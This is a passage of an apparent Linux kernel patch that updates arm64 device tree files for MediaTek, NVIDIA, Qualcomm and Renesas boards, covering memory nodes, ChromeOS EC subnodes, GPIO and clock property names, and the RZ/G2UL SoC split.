+-			interrupt-names = "mem", "ring0", "ring1",
+-				"ring2", "ring3", "eip";
++				<92 IRQ_TYPE_LEVEL_HIGH>,
++				<87 IRQ_TYPE_LEVEL_HIGH>;
++			interrupt-names = "ring0", "ring1", "ring2", "ring3",
++					  "eip", "mem";
+ 			clock-names = "core", "reg";
+ 			clocks = <&CP11X_LABEL(clk) 1 26>,
+ 				 <&CP11X_LABEL(clk) 1 17>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts b/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts
+index 2c35ed0734a47..b1ddc491d2936 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts
++++ b/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts
+@@ -74,6 +74,7 @@ led-1 {
+ 
+ 	memory@40000000 {
+ 		reg = <0 0x40000000 0 0x40000000>;
++		device_type = "memory";
+ 	};
+ 
+ 	reg_1p8v: regulator-1p8v {
+diff --git a/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts b/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts
+index f9313b697ac12..527dcb279ba52 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts
++++ b/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts
+@@ -56,6 +56,7 @@ key-wps {
+ 
+ 	memory@40000000 {
+ 		reg = <0 0x40000000 0 0x20000000>;
++		device_type = "memory";
+ 	};
+ 
+ 	reg_1p8v: regulator-1p8v {
+diff --git a/arch/arm64/boot/dts/mediatek/mt7986a.dtsi b/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
+index fc338bd497f51..108931e796465 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
+@@ -110,6 +110,7 @@ infracfg: infracfg@10001000 {
+ 			compatible = "mediatek,mt7986-infracfg", "syscon";
+ 			reg = <0 0x10001000 0 0x1000>;
+ 			#clock-cells = <1>;
++			#reset-cells = <1>;
+ 		};
+ 
+ 		wed_pcie: wed-pcie@10003000 {
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi b/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi
+index dccf367c7ec6c..3d95625f1b0b4 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi
+@@ -4,6 +4,8 @@
+  */
+ 
+ #include "mt8183-kukui.dtsi"
++/* Must come after mt8183-kukui.dtsi to modify cros_ec */
++#include <arm/cros-ec-keyboard.dtsi>
+ 
+ / {
+ 	panel: panel {
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-kukui-kakadu.dtsi b/arch/arm64/boot/dts/mediatek/mt8183-kukui-kakadu.dtsi
+index 50a0dd36b5fb3..0d3c7b8162ff0 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-kukui-kakadu.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183-kukui-kakadu.dtsi
+@@ -372,6 +372,16 @@ pen_eject {
+ 	};
+ };
+ 
++&cros_ec {
++	cbas {
++		compatible = "google,cros-cbas";
++	};
++
++	keyboard-controller {
++		compatible = "google,cros-ec-keyb-switches";
++	};
++};
++
+ &qca_wifi {
+ 	qcom,ath10k-calibration-variant = "GO_KAKADU";
+ };
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-kukui-kodama.dtsi b/arch/arm64/boot/dts/mediatek/mt8183-kukui-kodama.dtsi
+index 06f8c80bf5536..e73113cb51f53 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-kukui-kodama.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183-kukui-kodama.dtsi
+@@ -339,6 +339,16 @@ touch_pin_reset: pin_reset {
+ 	};
+ };
+ 
++&cros_ec {
++	cbas {
++		compatible = "google,cros-cbas";
++	};
++
++	keyboard-controller {
++		compatible = "google,cros-ec-keyb-switches";
++	};
++};
++
+ &qca_wifi {
+ 	qcom,ath10k-calibration-variant = "GO_KODAMA";
+ };
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-kukui-krane.dtsi b/arch/arm64/boot/dts/mediatek/mt8183-kukui-krane.dtsi
+index a7b0cb3ff7b0a..181da69d18f46 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-kukui-krane.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183-kukui-krane.dtsi
+@@ -343,6 +343,16 @@ rst_pin {
+ 	};
+ };
+ 
++&cros_ec {
++	cbas {
++		compatible = "google,cros-cbas";
++	};
++
++	keyboard-controller {
++		compatible = "google,cros-ec-keyb-switches";
++	};
++};
++
+ &qca_wifi {
+ 	qcom,ath10k-calibration-variant = "LE_Krane";
+ };
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi b/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
+index a428a581c93a8..1db97d94658b9 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
+@@ -896,10 +896,6 @@ usbc_extcon: extcon0 {
+ 			google,usb-port-id = <0>;
+ 		};
+ 
+-		cbas {
+-			compatible = "google,cros-cbas";
+-		};
+-
+ 		typec {
+ 			compatible = "google,cros-ec-typec";
+ 			#address-cells = <1>;
+@@ -999,5 +995,4 @@ hub@1 {
+ 	};
+ };
+ 
+-#include <arm/cros-ec-keyboard.dtsi>
+ #include <arm/cros-ec-sbs.dtsi>
+diff --git a/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi b/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
+index 50367da93cd79..c6080af1e4a30 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
+@@ -819,10 +819,6 @@ cros_ec: ec@0 {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 
+-		base_detection: cbas {
+-			compatible = "google,cros-cbas";
+-		};
+-
+ 		cros_ec_pwm: pwm {
+ 			compatible = "google,cros-ec-pwm";
+ 			#pwm-cells = <1>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8192.dtsi b/arch/arm64/boot/dts/mediatek/mt8192.dtsi
+index 2f40c6cc407c1..4ed8a0f187583 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8192.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8192.dtsi
+@@ -1539,7 +1539,7 @@ vcodec_enc: vcodec@17020000 {
+ 			mediatek,scp = <&scp>;
+ 			power-domains = <&spm MT8192_POWER_DOMAIN_VENC>;
+ 			clocks = <&vencsys CLK_VENC_SET1_VENC>;
+-			clock-names = "venc-set1";
++			clock-names = "venc_sel";
+ 			assigned-clocks = <&topckgen CLK_TOP_VENC_SEL>;
+ 			assigned-clock-parents = <&topckgen CLK_TOP_UNIVPLL_D4>;
+ 		};
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r1.dts b/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r1.dts
+index 3348ba69ff6cf..d86d193e5a75e 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r1.dts
++++ b/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r1.dts
+@@ -13,3 +13,7 @@ / {
+ &ts_10 {
+ 	status = "okay";
+ };
++
++&watchdog {
++	/delete-property/ mediatek,disable-extrst;
++};
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r2.dts b/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r2.dts
+index 4669e9d917f8c..5356f53308e24 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r2.dts
++++ b/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r2.dts
+@@ -33,3 +33,7 @@ pins-low-power-pcie0-disable {
+ &ts_10 {
+ 	status = "okay";
+ };
++
++&watchdog {
++	/delete-property/ mediatek,disable-extrst;
++};
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r3.dts b/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r3.dts
+index 5021edd02f7c1..fca3606cb951e 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r3.dts
++++ b/arch/arm64/boot/dts/mediatek/mt8195-cherry-tomato-r3.dts
+@@ -34,3 +34,7 @@ pins-low-power-pcie0-disable {
+ &ts_10 {
+ 	status = "okay";
+ };
++
++&watchdog {
++	/delete-property/ mediatek,disable-extrst;
++};
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195-demo.dts b/arch/arm64/boot/dts/mediatek/mt8195-demo.dts
+index 5117b2e7985af..998c2e78168a6 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195-demo.dts
++++ b/arch/arm64/boot/dts/mediatek/mt8195-demo.dts
+@@ -111,6 +111,7 @@ mt6360: pmic@34 {
+ 		compatible = "mediatek,mt6360";
+ 		reg = <0x34>;
+ 		interrupt-controller;
++		#interrupt-cells = <1>;
+ 		interrupts-extended = <&pio 101 IRQ_TYPE_EDGE_FALLING>;
+ 		interrupt-names = "IRQB";
+ 
+diff --git a/arch/arm64/boot/dts/nvidia/tegra234-p3737-0000+p3701-0000.dts b/arch/arm64/boot/dts/nvidia/tegra234-p3737-0000+p3701-0000.dts
+index f094011be9ed9..8099dc04ed2e1 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra234-p3737-0000+p3701-0000.dts
++++ b/arch/arm64/boot/dts/nvidia/tegra234-p3737-0000+p3701-0000.dts
+@@ -2024,7 +2024,7 @@ ethernet@6800000 {
+ 			status = "okay";
+ 
+ 			phy-handle = <&mgbe0_phy>;
+-			phy-mode = "usxgmii";
++			phy-mode = "10gbase-r";
+ 
+ 			mdio {
+ 				#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+index 135ff4368c4a6..5c04c91b0ee2b 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+@@ -532,7 +532,7 @@ &mss_pil {
+ &pcie0 {
+ 	status = "okay";
+ 	perst-gpios = <&tlmm 35 GPIO_ACTIVE_LOW>;
+-	enable-gpio = <&tlmm 134 GPIO_ACTIVE_HIGH>;
++	wake-gpios = <&tlmm 134 GPIO_ACTIVE_HIGH>;
+ 
+ 	vddpe-3v3-supply = <&pcie0_3p3v_dual>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index eb1a9369926d2..9dccecd9fcaef 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -1822,8 +1822,8 @@ pcie0: pci@1c00000 {
+ 			phys = <&pcie0_lane>;
+ 			phy-names = "pciephy";
+ 
+-			perst-gpio = <&tlmm 35 GPIO_ACTIVE_HIGH>;
+-			enable-gpio = <&tlmm 37 GPIO_ACTIVE_HIGH>;
++			perst-gpios = <&tlmm 35 GPIO_ACTIVE_HIGH>;
++			wake-gpios = <&tlmm 37 GPIO_ACTIVE_HIGH>;
+ 
+ 			pinctrl-names = "default";
+ 			pinctrl-0 = <&pcie0_default_state>;
+@@ -1925,7 +1925,7 @@ pcie1: pci@1c08000 {
+ 			phys = <&pcie1_lane>;
+ 			phy-names = "pciephy";
+ 
+-			perst-gpio = <&tlmm 102 GPIO_ACTIVE_HIGH>;
++			perst-gpios = <&tlmm 102 GPIO_ACTIVE_HIGH>;
+ 			enable-gpio = <&tlmm 104 GPIO_ACTIVE_HIGH>;
+ 
+ 			pinctrl-names = "default";
+diff --git a/arch/arm64/boot/dts/renesas/r8a779a0.dtsi b/arch/arm64/boot/dts/renesas/r8a779a0.dtsi
+index ed9400f903c9e..b677ef6705d94 100644
+--- a/arch/arm64/boot/dts/renesas/r8a779a0.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a779a0.dtsi
+@@ -656,8 +656,8 @@ channel7 {
+ 
+ 		avb0: ethernet@e6800000 {
+ 			compatible = "renesas,etheravb-r8a779a0",
+-				     "renesas,etheravb-rcar-gen3";
+-			reg = <0 0xe6800000 0 0x800>;
++				     "renesas,etheravb-rcar-gen4";
++			reg = <0 0xe6800000 0 0x1000>;
+ 			interrupts = <GIC_SPI 256 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 257 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 258 IRQ_TYPE_LEVEL_HIGH>,
+@@ -704,8 +704,8 @@ avb0: ethernet@e6800000 {
+ 
+ 		avb1: ethernet@e6810000 {
+ 			compatible = "renesas,etheravb-r8a779a0",
+-				     "renesas,etheravb-rcar-gen3";
+-			reg = <0 0xe6810000 0 0x800>;
++				     "renesas,etheravb-rcar-gen4";
++			reg = <0 0xe6810000 0 0x1000>;
+ 			interrupts = <GIC_SPI 281 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 282 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 283 IRQ_TYPE_LEVEL_HIGH>,
+@@ -752,7 +752,7 @@ avb1: ethernet@e6810000 {
+ 
+ 		avb2: ethernet@e6820000 {
+ 			compatible = "renesas,etheravb-r8a779a0",
+-				     "renesas,etheravb-rcar-gen3";
++				     "renesas,etheravb-rcar-gen4";
+ 			reg = <0 0xe6820000 0 0x1000>;
+ 			interrupts = <GIC_SPI 306 IRQ_TYPE_LEVEL_HIGH>,
+ 					<GIC_SPI 307 IRQ_TYPE_LEVEL_HIGH>,
+@@ -800,7 +800,7 @@ avb2: ethernet@e6820000 {
+ 
+ 		avb3: ethernet@e6830000 {
+ 			compatible = "renesas,etheravb-r8a779a0",
+-				     "renesas,etheravb-rcar-gen3";
++				     "renesas,etheravb-rcar-gen4";
+ 			reg = <0 0xe6830000 0 0x1000>;
+ 			interrupts = <GIC_SPI 331 IRQ_TYPE_LEVEL_HIGH>,
+ 					<GIC_SPI 332 IRQ_TYPE_LEVEL_HIGH>,
+@@ -848,7 +848,7 @@ avb3: ethernet@e6830000 {
+ 
+ 		avb4: ethernet@e6840000 {
+ 			compatible = "renesas,etheravb-r8a779a0",
+-				     "renesas,etheravb-rcar-gen3";
++				     "renesas,etheravb-rcar-gen4";
+ 			reg = <0 0xe6840000 0 0x1000>;
+ 			interrupts = <GIC_SPI 356 IRQ_TYPE_LEVEL_HIGH>,
+ 					<GIC_SPI 357 IRQ_TYPE_LEVEL_HIGH>,
+@@ -896,7 +896,7 @@ avb4: ethernet@e6840000 {
+ 
+ 		avb5: ethernet@e6850000 {
+ 			compatible = "renesas,etheravb-r8a779a0",
+-				     "renesas,etheravb-rcar-gen3";
++				     "renesas,etheravb-rcar-gen4";
+ 			reg = <0 0xe6850000 0 0x1000>;
+ 			interrupts = <GIC_SPI 381 IRQ_TYPE_LEVEL_HIGH>,
+ 					<GIC_SPI 382 IRQ_TYPE_LEVEL_HIGH>,
+@@ -1019,7 +1019,7 @@ tpu: pwm@e6e80000 {
+ 
+ 		msiof0: spi@e6e90000 {
+ 			compatible = "renesas,msiof-r8a779a0",
+-				     "renesas,rcar-gen3-msiof";
++				     "renesas,rcar-gen4-msiof";
+ 			reg = <0 0xe6e90000 0 0x0064>;
+ 			interrupts = <GIC_SPI 245 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 618>;
+@@ -1034,7 +1034,7 @@ msiof0: spi@e6e90000 {
+ 
+ 		msiof1: spi@e6ea0000 {
+ 			compatible = "renesas,msiof-r8a779a0",
+-				     "renesas,rcar-gen3-msiof";
++				     "renesas,rcar-gen4-msiof";
+ 			reg = <0 0xe6ea0000 0 0x0064>;
+ 			interrupts = <GIC_SPI 246 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 619>;
+@@ -1049,7 +1049,7 @@ msiof1: spi@e6ea0000 {
+ 
+ 		msiof2: spi@e6c00000 {
+ 			compatible = "renesas,msiof-r8a779a0",
+-				     "renesas,rcar-gen3-msiof";
++				     "renesas,rcar-gen4-msiof";
+ 			reg = <0 0xe6c00000 0 0x0064>;
+ 			interrupts = <GIC_SPI 247 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 620>;
+@@ -1064,7 +1064,7 @@ msiof2: spi@e6c00000 {
+ 
+ 		msiof3: spi@e6c10000 {
+ 			compatible = "renesas,msiof-r8a779a0",
+-				     "renesas,rcar-gen3-msiof";
++				     "renesas,rcar-gen4-msiof";
+ 			reg = <0 0xe6c10000 0 0x0064>;
+ 			interrupts = <GIC_SPI 248 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 621>;
+@@ -1079,7 +1079,7 @@ msiof3: spi@e6c10000 {
+ 
+ 		msiof4: spi@e6c20000 {
+ 			compatible = "renesas,msiof-r8a779a0",
+-				     "renesas,rcar-gen3-msiof";
++				     "renesas,rcar-gen4-msiof";
+ 			reg = <0 0xe6c20000 0 0x0064>;
+ 			interrupts = <GIC_SPI 249 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 622>;
+@@ -1094,7 +1094,7 @@ msiof4: spi@e6c20000 {
+ 
+ 		msiof5: spi@e6c28000 {
+ 			compatible = "renesas,msiof-r8a779a0",
+-				     "renesas,rcar-gen3-msiof";
++				     "renesas,rcar-gen4-msiof";
+ 			reg = <0 0xe6c28000 0 0x0064>;
+ 			interrupts = <GIC_SPI 250 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD 623>;
+diff --git a/arch/arm64/boot/dts/renesas/r8a779g0.dtsi b/arch/arm64/boot/dts/renesas/r8a779g0.dtsi
+index d58b18802cb01..868d1a3cbdf61 100644
+--- a/arch/arm64/boot/dts/renesas/r8a779g0.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a779g0.dtsi
+@@ -337,7 +337,7 @@ hscif0: serial@e6540000 {
+ 		avb0: ethernet@e6800000 {
+ 			compatible = "renesas,etheravb-r8a779g0",
+ 				     "renesas,etheravb-rcar-gen4";
+-			reg = <0 0xe6800000 0 0x800>;
++			reg = <0 0xe6800000 0 0x1000>;
+ 			interrupts = <GIC_SPI 335 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 336 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 337 IRQ_TYPE_LEVEL_HIGH>,
+@@ -384,7 +384,7 @@ avb0: ethernet@e6800000 {
+ 		avb1: ethernet@e6810000 {
+ 			compatible = "renesas,etheravb-r8a779g0",
+ 				     "renesas,etheravb-rcar-gen4";
+-			reg = <0 0xe6810000 0 0x800>;
++			reg = <0 0xe6810000 0 0x1000>;
+ 			interrupts = <GIC_SPI 360 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 361 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 362 IRQ_TYPE_LEVEL_HIGH>,
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g043.dtsi b/arch/arm64/boot/dts/renesas/r9a07g043.dtsi
+index a4738842f0646..7f88395ff7997 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g043.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g043.dtsi
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause)
+ /*
+- * Device Tree Source for the RZ/G2UL SoC
++ * Device Tree Source for the RZ/Five and RZ/G2UL SoCs
+  *
+  * Copyright (C) 2022 Renesas Electronics Corp.
+  */
+@@ -68,36 +68,8 @@ opp-1000000000 {
+ 		};
+ 	};
+ 
+-	cpus {
+-		#address-cells = <1>;
+-		#size-cells = <0>;
+-
+-		cpu0: cpu@0 {
+-			compatible = "arm,cortex-a55";
+-			reg = <0>;
+-			device_type = "cpu";
+-			#cooling-cells = <2>;
+-			next-level-cache = <&L3_CA55>;
+-			enable-method = "psci";
+-			clocks = <&cpg CPG_CORE R9A07G043_CLK_I>;
+-			operating-points-v2 = <&cluster0_opp>;
+-		};
+-
+-		L3_CA55: cache-controller-0 {
+-			compatible = "cache";
+-			cache-unified;
+-			cache-size = <0x40000>;
+-		};
+-	};
+-
+-	psci {
+-		compatible = "arm,psci-1.0", "arm,psci-0.2";
+-		method = "smc";
+-	};
+-
+ 	soc: soc {
+ 		compatible = "simple-bus";
+-		interrupt-parent = <&gic>;
+ 		#address-cells = <2>;
+ 		#size-cells = <2>;
+ 		ranges;
+@@ -545,12 +517,6 @@ cpg: clock-controller@11010000 {
+ 		sysc: system-controller@11020000 {
+ 			compatible = "renesas,r9a07g043-sysc";
+ 			reg = <0 0x11020000 0 0x10000>;
+-			interrupts = <SOC_PERIPHERAL_IRQ(42) IRQ_TYPE_LEVEL_HIGH>,
+-				     <SOC_PERIPHERAL_IRQ(43) IRQ_TYPE_LEVEL_HIGH>,
+-				     <SOC_PERIPHERAL_IRQ(44) IRQ_TYPE_LEVEL_HIGH>,
+-				     <SOC_PERIPHERAL_IRQ(45) IRQ_TYPE_LEVEL_HIGH>;
+-			interrupt-names = "lpm_int", "ca55stbydone_int",
+-					  "cm33stbyr_int", "ca55_deny";
+ 			status = "disabled";
+ 		};
+ 
+@@ -603,16 +569,6 @@ dmac: dma-controller@11820000 {
+ 			dma-channels = <16>;
+ 		};
+ 
+-		gic: interrupt-controller@11900000 {
+-			compatible = "arm,gic-v3";
+-			#interrupt-cells = <3>;
+-			#address-cells = <0>;
+-			interrupt-controller;
+-			reg = <0x0 0x11900000 0 0x40000>,
+-			      <0x0 0x11940000 0 0x60000>;
+-			interrupts = <GIC_PPI 9 IRQ_TYPE_LEVEL_LOW>;
+-		};
+-
+ 		sdhi0: mmc@11c00000 {
+ 			compatible = "renesas,sdhi-r9a07g043",
+ 				     "renesas,rcar-gen3-sdhi";
+@@ -893,12 +849,4 @@ target: trip-point {
+ 			};
+ 		};
+ 	};
+-
+-	timer {
+-		compatible = "arm,armv8-timer";
+-		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>;
+-	};
+ };
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi b/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi
+index 96f935bc2d4d1..011d4c88f4ed9 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi
+@@ -10,3 +10,139 @@
+ #define SOC_PERIPHERAL_IRQ(nr)		GIC_SPI nr
+ 
+ #include "r9a07g043.dtsi"
++
++/ {
++	cpus {
++		#address-cells = <1>;
++		#size-cells = <0>;
++
++		cpu0: cpu@0 {
++			compatible = "arm,cortex-a55";
++			reg = <0>;
++			device_type = "cpu";
++			#cooling-cells = <2>;
++			next-level-cache = <&L3_CA55>;
++			enable-method = "psci";
++			clocks = <&cpg CPG_CORE R9A07G043_CLK_I>;
++			operating-points-v2 = <&cluster0_opp>;
++		};
++
++		L3_CA55: cache-controller-0 {
++			compatible = "cache";
++			cache-unified;
++			cache-size = <0x40000>;
++		};
++	};
++
++	psci {
++		compatible = "arm,psci-1.0", "arm,psci-0.2";
++		method = "smc";
++	};
++
++	timer {
++		compatible = "arm,armv8-timer";
++		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
++				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
++				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
++				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>;
++	};
++};
++
++&soc {
++	interrupt-parent = <&gic>;
++
++	irqc: interrupt-controller@110a0000 {
++		compatible = "renesas,r9a07g043u-irqc",
++			     "renesas,rzg2l-irqc";
++		reg = <0 0x110a0000 0 0x10000>;
++		#interrupt-cells = <2>;
++		#address-cells = <0>;
++		interrupt-controller;
++		interrupts = <SOC_PERIPHERAL_IRQ(0) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(1) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(2) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(3) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(4) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(5) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(6) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(7) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(8) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(444) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(445) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(446) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(447) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(448) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(449) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(450) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(451) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(452) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(453) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(454) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(455) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(456) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(457) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(458) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(459) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(460) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(461) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(462) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(463) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(464) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(465) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(466) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(467) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(468) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(469) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(470) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(471) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(472) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(473) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(474) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(475) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(25) IRQ_TYPE_EDGE_RISING>,
++			     <SOC_PERIPHERAL_IRQ(34) IRQ_TYPE_EDGE_RISING>,
++			     <SOC_PERIPHERAL_IRQ(35) IRQ_TYPE_EDGE_RISING>,
++			     <SOC_PERIPHERAL_IRQ(36) IRQ_TYPE_EDGE_RISING>,
++			     <SOC_PERIPHERAL_IRQ(37) IRQ_TYPE_EDGE_RISING>,
++			     <SOC_PERIPHERAL_IRQ(38) IRQ_TYPE_EDGE_RISING>,
++			     <SOC_PERIPHERAL_IRQ(39) IRQ_TYPE_EDGE_RISING>;
++		interrupt-names = "nmi",
++				  "irq0", "irq1", "irq2", "irq3",
++				  "irq4", "irq5", "irq6", "irq7",
++				  "tint0", "tint1", "tint2", "tint3",
++				  "tint4", "tint5", "tint6", "tint7",
++				  "tint8", "tint9", "tint10", "tint11",
